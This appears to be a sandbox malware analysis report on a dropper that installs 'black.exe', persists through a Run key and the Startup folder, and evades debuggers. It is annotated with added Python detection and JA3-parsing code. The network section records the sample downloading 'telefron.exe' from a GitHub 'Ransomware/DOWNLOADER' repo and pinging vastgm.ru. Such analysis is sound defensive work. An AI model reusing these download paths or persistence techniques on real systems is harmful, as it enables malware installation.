

Windows Analysis Report
Y5kEUsYDFr.exe

Overview

General Information

Sample name: Y5kEUsYDFr.exe
renamed because original name is a hash value
Original sample name: ec773998b0078cc58100fdb4d27dc3f4.exe
Analysis ID: 1571211
MD5: ec773998b0078cc58100fdb4d27dc3f4
SHA1: 491a3d8d31c9eabcd8f6236203c54daa12031aab
SHA256: ff4fd58c1db6e88c768665983b2212e53204d7a07b3769883882179d34258933
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the startup folder
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Uses ping.exe to check the status of other devices and networks
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • Y5kEUsYDFr.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\Y5kEUsYDFr.exe" MD5: EC773998B0078CC58100FDB4D27DC3F4)
    • black.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe" MD5: 09929B04B0C29E2722009F49FAF7183C)
      • cmd.exe (PID: 1308 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 1460 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
      • cmd.exe (PID: 2600 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 3168 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
  • black.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Roaming\black.exe" MD5: 09929B04B0C29E2722009F49FAF7183C)
    • cmd.exe (PID: 5848 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3064 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
    • cmd.exe (PID: 5688 cmdline: "C:\Windows\System32\cmd.exe" /c ping vastgm.ru MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1168 cmdline: ping vastgm.ru MD5: B3624DD758CCECF93A1226CEF252CA12)
  • Acrobat.exe (PID: 4936 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 2208 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 3844 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1644,i,11227877826786957155,3609580182791793806,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Registry Key set (Sigma: CurrentVersion Autorun Keys Modification) | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\black.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe, ProcessId: 6360, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\black
Source: File created (Sigma: Startup Folder File Write) | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe, ProcessId: 6360, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe
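The two Sigma matches above are easy to reproduce outside the sandbox: Sysmon Event ID 13 (SetValue) on a Run-style key, and Event ID 11 (FileCreate) of an executable under a Startup folder. The block below is an added example, not code from the Joe Sandbox report or from the Sigma rules' authors. It runs both conditions over Sysmon-style event records constructed here from the values the report shows (PID 6360 setting HKCU\...\Run\black and dropping black.exe into the Startup folder), adds one benign temp-file write as a control, and correlates the hits back to the process that established persistence. The key patterns, the executable-extension list and the event records themselves are assumptions for illustration; the real Sigma rules cover more locations.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events mirroring the two Sigma matches in the report
# (PID 6360 sets HKCU\...\Run\black and drops black.exe into the Startup folder),
# plus one benign temp-file write that must not match.
SAMPLE_EVENTS = [
    {
        "EventID": 13, "EventType": "SetValue", "ProcessId": 6360,
        "Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe",
        "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\black",
        "Details": r"C:\Users\user\AppData\Roaming\black.exe",
    },
    {
        "EventID": 11, "ProcessId": 6360,
        "Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe",
        "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe",
    },
    {   # benign control (constructed): same process writing a scratch file to its own temp dir
        "EventID": 11, "ProcessId": 6360,
        "Image": r"C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe",
        "TargetFilename": r"C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_unpack.dat",
    },
]

# Run-style autorun values under CurrentVersion, HKCU or HKLM (Wow6432Node included).
# Assumed subset of what the Sigma rule covers.
AUTORUN_KEY_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce|RunOnceEx|RunServices|RunServicesOnce)\\",
    re.IGNORECASE,
)
# Per-user and all-users Startup folders share this path suffix.
STARTUP_DIR_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+$", re.IGNORECASE)
# Extensions worth alerting on when written to Startup (assumed list).
PE_EXT_RE = re.compile(r"\.(exe|dll|scr|com|bat|cmd|vbs|js|ps1|lnk)$", re.IGNORECASE)


def is_autorun_key_modification(ev):
    """Sysmon Event ID 13 SetValue on a Run-style key: returns the registered command, else None."""
    if ev.get("EventID") != 13 or ev.get("EventType") != "SetValue":
        return None
    if not AUTORUN_KEY_RE.search(ev.get("TargetObject", "")):
        return None
    return ev.get("Details", "")


def is_startup_folder_write(ev):
    """Sysmon Event ID 11 FileCreate of an executable in a Startup folder: returns the path, else None."""
    if ev.get("EventID") != 11:
        return None
    path = ev.get("TargetFilename", "")
    if STARTUP_DIR_RE.search(path) and PE_EXT_RE.search(path):
        return path
    return None


def triage(events):
    """Run both rules over an event stream; yields (rule_name, pid, artifact) per match."""
    hits = []
    for ev in events:
        target = is_autorun_key_modification(ev)
        if target is not None:
            hits.append(("autorun_key_modification", ev["ProcessId"], target))
            continue
        path = is_startup_folder_write(ev)
        if path is not None:
            hits.append(("startup_folder_file_write", ev["ProcessId"], path))
    return hits


def persistence_by_process(events):
    """Correlate: which processes set up persistence, through which mechanisms, pointing at what."""
    summary = defaultdict(lambda: {"mechanisms": set(), "artifacts": []})
    for rule, pid, artifact in triage(events):
        summary[pid]["mechanisms"].add(rule)
        summary[pid]["artifacts"].append(artifact)
    return dict(summary)


if __name__ == "__main__":
    for rule, pid, artifact in triage(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} -> {artifact}")
    for pid, info in persistence_by_process(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {len(info['mechanisms'])} persistence mechanisms, {info['artifacts']}")
```

A process that shows up with two mechanisms, as PID 6360 does here, is a stronger signal than either match alone; both autostart targets also live under the user's profile, which is where a response playbook would go looking for the dropped copies.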
No Suricata rule has matched



AV Detection

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | Avira: detection malicious, Label: HEUR/AGEN.1310014
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Avira: detection malicious, Label: HEUR/AGEN.1310014
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | Avira: detection malicious, Label: HEUR/AGEN.1310014
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\black.exe | ReversingLabs: Detection: 34%
Source: Y5kEUsYDFr.exe | ReversingLabs: Detection: 47%
Source: Y5kEUsYDFr.exe | Virustotal: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | Joe Sandbox ML: detected
Source: Y5kEUsYDFr.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: Y5kEUsYDFr.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb | source: Y5kEUsYDFr.exe
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9EB190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9FFCA0 FindFirstFileExA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh (1_2_023D9A58)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then jmp 023D29E9h (1_2_023D28F1)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then jmp 023D29E9h (1_2_023D2908)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh (1_2_023D9A4C)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-08h] (1_2_02501288)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (1_2_02500740)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 715E6120h (1_2_02500B18)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then push dword ptr [ebp-04h] (1_2_02500818)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (1_2_025010A0)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 715E60BCh (1_2_02500A74)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 715E60BCh (1_2_02500A78)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 715E524Ch (1_2_02501620)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 71631468h (1_2_025012E0)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_02500318)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then push dword ptr [ebp-04h] (1_2_02501700)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 715E6120h (1_2_02500B01)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_02500F28)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, 7162D5CCh (1_2_025013D0)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_02500BFD)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_02500F9E)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_02500FB0)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_025003A0)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_02500C00)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (1_2_025014F8)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (1_2_02501085)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Code function: 4x nop then push dword ptr [ebp-0Ch] (1_2_025004A0)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 715E6120h (7_2_046C0870)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (7_2_046C1298)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (7_2_046C0740)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-08h] (7_2_046C0F38)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 715E6120h (7_2_046C0868)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0C65)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 7162D5CCh (7_2_046C1065)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (7_2_046C127D)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then push dword ptr [ebp-04h] (7_2_046C1440)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then push dword ptr [ebp-04h] (7_2_046C1421)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0CED)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C02F9)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then push dword ptr [ebp-0Ch] (7_2_046C04A0)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0C80)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 7162D5CCh (7_2_046C1080)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then push dword ptr [ebp-0Ch] (7_2_046C0481)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 715E524Ch (7_2_046C1360)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 71631468h (7_2_046C0F75)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 715E524Ch (7_2_046C1341)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0958)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-14h] (7_2_046C0725)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-08h] (7_2_046C0F27)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0939)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0D08)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0318)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 715E60BCh (7_2_046C07D0)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C11A8)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C03A0)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 715E60BCh (7_2_046C07B5)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C118D)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, dword ptr [ebp-10h] (7_2_046C0385)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov ecx, 71631468h (7_2_046C0F90)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh (7_2_04BD8C90)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 7FFFFFFFh (7_2_04BD8C84)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then jmp 04BD29E9h (7_2_04BD28F1)
Source: C:\Users\user\AppData\Roaming\black.exe | Code function: 4x nop then jmp 04BD29E9h (7_2_04BD2908)

Networking

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: global traffic | HTTP traffic detected: GET /keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive (2 occurrences)
Source: Joe Sandbox View | IP Address: 69.192.108.223
Source: Joe Sandbox View | IP Address: 20.233.83.145
Source: Joe Sandbox View | ASN Name: DDOS-GUARDRU
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49731 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 69.192.108.223 (11 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 occurrences)
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: vastgm.ru
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: GitHub.com | Date: Mon, 09 Dec 2024 06:03:47 GMT | Content-Type: text/html; charset=utf-8 | Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With | Cache-Control: no-cache | Strict-Transport-Security: max-age=31536000; includeSubdomains; preload | X-Frame-Options: deny | X-Content-Type-Options: nosniff | X-XSS-Protection: 0 | Referrer-Policy: no-referrer-when-downgrade
Source: black.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmp, black.exe, 00000007.00000002.4147454579.0000000002671000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2D85F72862B55C4EADD9E66E06947F3D0.23.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: black.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
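The "TLS 1.0" and JA3 entries above both come from the same place, the ClientHello the sample sends. The block below is an added example, not code from the Joe Sandbox report: it parses a ClientHello record, builds the JA3 string (version, ciphers, extensions, groups, point formats, GREASE stripped) and its MD5, and decides what the highest version the client actually offers is. The ClientHello it parses is constructed here to resemble a legacy client (client_version 0x0301, no supported_versions extension); the SNI name, cipher suites and extension set are assumptions, and the resulting JA3 hash is not the one the report lists.

```python
import hashlib
import struct

GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}
VERSION_NAMES = {0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1",
                 0x0303: "TLS 1.2", 0x0304: "TLS 1.3"}


def build_client_hello(client_version, ciphers, extensions):
    """Constructed fixture: one TLS record carrying one ClientHello with an empty session id."""
    body = struct.pack(">H", client_version) + bytes(32) + b"\x00"          # version, random, sid
    body += struct.pack(">H", 2 * len(ciphers)) + b"".join(struct.pack(">H", c) for c in ciphers)
    body += b"\x01\x00"                                                      # one compression: null
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack(">H", len(ext)) + ext
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body               # HandshakeType client_hello
    return b"\x16" + struct.pack(">HH", 0x0301, len(handshake)) + handshake  # record: handshake, legacy version


def parse_client_hello(record):
    """Pull the JA3-relevant fields out of a ClientHello record; ValueError if it is something else."""
    if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    hs_len = int.from_bytes(record[6:9], "big")
    hello = record[9:9 + hs_len]
    if len(hello) != hs_len:
        raise ValueError("truncated ClientHello")
    client_version = struct.unpack_from(">H", hello, 0)[0]
    pos = 2 + 32                                   # skip client_random
    sid_len = hello[pos]; pos += 1 + sid_len
    cs_len = struct.unpack_from(">H", hello, pos)[0]; pos += 2
    ciphers = list(struct.unpack_from(f">{cs_len // 2}H", hello, pos)); pos += cs_len
    comp_len = hello[pos]; pos += 1 + comp_len
    ext_types, groups, points, supported_versions = [], [], [], []
    if pos + 2 <= len(hello):
        ext_len = struct.unpack_from(">H", hello, pos)[0]; pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack_from(">HH", hello, pos); pos += 4
            data = hello[pos:pos + elen]; pos += elen
            ext_types.append(etype)
            if etype == 10:     # supported_groups: u16 list length, then u16 ids
                n = struct.unpack_from(">H", data, 0)[0] // 2
                groups = list(struct.unpack_from(f">{n}H", data, 2))
            elif etype == 11:   # ec_point_formats: u8 list length, then u8 ids
                points = list(data[1:1 + data[0]])
            elif etype == 43:   # supported_versions: u8 list length, then u16 versions
                n = data[0] // 2
                supported_versions = list(struct.unpack_from(f">{n}H", data, 1))
    return {"client_version": client_version, "ciphers": ciphers, "extensions": ext_types,
            "groups": groups, "points": points, "supported_versions": supported_versions}


def _drop_grease(values):
    return [v for v in values if v not in GREASE]


def ja3_string(h):
    return ",".join([
        str(h["client_version"]),
        "-".join(map(str, _drop_grease(h["ciphers"]))),
        "-".join(map(str, _drop_grease(h["extensions"]))),
        "-".join(map(str, _drop_grease(h["groups"]))),
        "-".join(map(str, h["points"])),
    ])


def ja3_hash(h):
    return hashlib.md5(ja3_string(h).encode()).hexdigest()


def highest_offered_version(h):
    """supported_versions (ext 43) is authoritative when present; client_version only otherwise."""
    offered = _drop_grease(h["supported_versions"]) or [h["client_version"]]
    return max(offered)


def offers_only_legacy_tls(h):
    """True when the best the client can negotiate is TLS 1.1 or older."""
    return highest_offered_version(h) <= 0x0302


# Constructed ClientHello: client_version TLS 1.0, three old suites, SNI + groups + point formats,
# and no supported_versions extension, i.e. a client that genuinely tops out at TLS 1.0.
SAMPLE_HELLO = build_client_hello(
    0x0301,
    [0x002f, 0x0035, 0xc013],
    [
        (0, b"\x00\x0d\x00\x00\x0agithub.com"),   # server_name (name chosen for the example)
        (10, b"\x00\x04\x00\x17\x00\x18"),        # supported_groups: secp256r1, secp384r1
        (11, b"\x01\x00"),                        # ec_point_formats: uncompressed
    ],
)

if __name__ == "__main__":
    hello = parse_client_hello(SAMPLE_HELLO)
    print("highest offered:", VERSION_NAMES[highest_offered_version(hello)])
    print("ja3:", ja3_string(hello), "->", ja3_hash(hello))
```

The caveat a practitioner should keep in mind when reading a "TLS 1.0" verdict: the record-layer version and even client_version are legacy fields that modern stacks pin to 0x0301 or 0x0303, so a client is only really stuck on TLS 1.0 when it sends no supported_versions extension and client_version is 0x0301, which is what the constructed hello above does and what highest_offered_version checks.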

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process information set: 01 00 00 00 (NtSetInformationProcess with ProcessBreakOnTermination = 1: terminating the process then bugchecks the system, which is the "Protects its processes via BreakOnTermination flag" signature above)

System Summary

Source: black.exe.0.dr | Static PE information: section name: .|]Y
Source: black.exe.0.dr | Static PE information: section name: .z~z
Source: black.exe.0.dr | Static PE information: section name: .%?T
Source: black.exe.1.dr | Static PE information: section name: .|]Y
